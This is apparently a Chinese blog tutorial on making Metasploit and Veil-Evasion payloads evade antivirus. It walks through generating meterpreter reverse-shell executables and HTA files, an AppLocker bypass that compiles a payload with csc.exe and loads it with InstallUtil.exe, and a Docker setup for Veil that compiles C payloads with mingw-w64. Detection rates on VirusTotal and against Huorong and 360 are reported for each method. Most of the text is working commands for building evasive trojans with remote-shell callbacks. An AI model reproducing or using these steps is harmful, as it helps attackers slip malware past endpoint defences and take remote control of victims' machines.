Evasion模块
参考链接:
applocker_evasion_install_util.md:
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md
基于白名单Csc.exe执行payload:https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji
使用veil绕过杀软:https://blog.csdn.net/wyf12138/article/details/79825833
免杀后门之MSF&Veil-Evasion的完美结合http://www.secist.com/archives/1107.html
APT级的全面免杀:https://xz.aliyun.com/t/4191
生成exe(VT查杀率42/71)
show evasion
use windows/windows_defender_exe
set filename test.exe
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs
virustotal.com中42/71个报毒
火绒以及360都会拦
生成hta(VT查杀率23/58)
show evasion
use windows/windows_defender_js_hta
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.42.138
set LPORT 3333
run
handler -H 192.168.42.138 -P 3333 -p windows/meterpreter/reverse_tcp
jobs
可以过火绒,但是不能过360(但是vt上没报毒,所以vt上有时候并不准)
生成install_util(VT查杀率14/70)
use windows/applocker_evasion_install_util
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.138
set lport 3333
run
根据说明,需要使用csc.exe进行编译一下,然后用InstallUtil.exe加载文件。
csc.exe是微软.NET Framework 中的C#语言编译器,本机安装了.net后就可以找到该文件。我这里用vs2019里的csc.exe进行编译,生成install_util.exe。
Csc.exe /out:install_util.exe c:\install_util.txt
直接执行install_util.exe是没有任何反应的,需要使用InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe来加载。
可以成功
不过这个的应用难度比较大,需要目标机上面有.net环境,而且现今各种杀软对.net的查杀都比较严重,所以应用场景一般,而且如果打包把环境拷贝的话,更是加大了木马的体积,更容易被发现
而且在2019年1月msf5更新的不止evasion模块,还有个更强大的模板编译函数Metasploit::Framework::Compiler,提供了更强大的自定义免杀机制。后面文章会讲述该模块使用。
Veil免杀
Veil、Venom和Shellter是三大老牌免杀工具,虽然说人怕出名猪怕壮,但目前这几款免杀工具在扩展性和免杀能力方面依然有着不错的表现。
Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避了常见防病毒产品的检测。
Veil的安装
安装参考:https://www.freebuf.com/sectool/89024.html
kali快速安装
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
亲身体验过,安装以及执行会出现各种问题,依赖包也会出现各种问题,无论是快速安装还是常规手动安装都没能解决。开始以为自己的问题,后来发现其他人也有一样的困惑,但是也有其他人一遍成功。。。
后来,发现有人做好了veil的docker镜像,简单便捷,一键运行。
Docker安装
apt install docker
apt install docker-compose
在kali里安装docker后,添加docker加速镜像地址:
vi /etc/docker/daemon.json
{
"registry-mirrors": [
"https://1nj0zren.mirror.aliyuncs.com",
"https://docker.mirrors.ustc.edu.cn",
"http://f1361db2.m.daocloud.io",
"https://registry.docker-cn.com"
]
}
systemctl daemon-reload
systemctl restart docker
docker pull mattiasohlsson/veil
docker run -it -v /tmp/veil-output:/var/lib/veil/output:Z mattiasohlsson/veil
-v /tmp/veil-output:/var/lib/veil/output:Z是将宿主机的/tmp/veil-output目录映射到docker里面,这样veil生成的payload可以直接在宿主机里使用。
Docker ps查看镜像
docker exec -it a61373de85e9 /bin/bash
然后Veil命令即可进入veil的界面
veil使用
veil有两个免杀的工具,Evasion和Ordnance。
Ordnance可生成在Veil-Evasion中使用的shellcode,Evasion是用做文件免杀。
我们一般选择Evasion
use 1
list
推荐使用以go和ruby语言encode的编码方式。像python这类的与用户有较高的交互就容易被查杀。
veil原理可以参考这篇文章:https://xz.aliyun.com/t/4191
使用veil直接生成exe(VT查杀率43/69)
我们使用go语言生成msf的payload
use 15
set lhost 192.168.42.138
set lport 3334
generate
名称:go_msf
因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
Msf中进行监听:
use multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.42.138
set lport 3334
run
可以过火绒,但是过不了360,缺点是体积太大了,go语言生成的exe大约2M,python生成的exe大约4M,ruby生成的exe大约700K,相比msf原生态的exe大打多了。而且vt的效果:
使用veil+mingw-w64(VT查杀率4/71)
use 1
use 7 (选择payload c/meterpreter/rev_tcp.py)
set lhost 192.168.42.138
set lport 3333
generate
生成文件名为c_msf
这个步骤生成了一个可以被msf利用的c_msf.c,然后用mingw-w64编译
mingw-w64的安装可参考https://zhuanlan.zhihu.com/p/76613134
安装完成mingw-w64之后输入命令:
gcc c_msf.c -o c_msf.exe -lwsock32
编译完成,然后进行测试
kali端:
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.138
set lport 3333
run
然后靶机运行编译生成的c_msf.exe木马
WTF!!!!!!
上线立刻掉线,搞不懂,不过过了360和火绒
而且vt效果出奇的好
这和重剑无锋大佬的结果有很大出入,待我回去仔细研究一波(换了端口试验了一下,不行,猜测和mingw-w64的版本有关)
如果哪位大佬试验成功,请务必私信我,灰常感谢
veil功能还是很强大的,生成的shellcode自身免杀能力就不错,而且支持多种语言的shellcode编译打包,和msf及cs可以无缝对接,值得人好好研究一下。三大老牌免杀工具不是浪得虚名的~~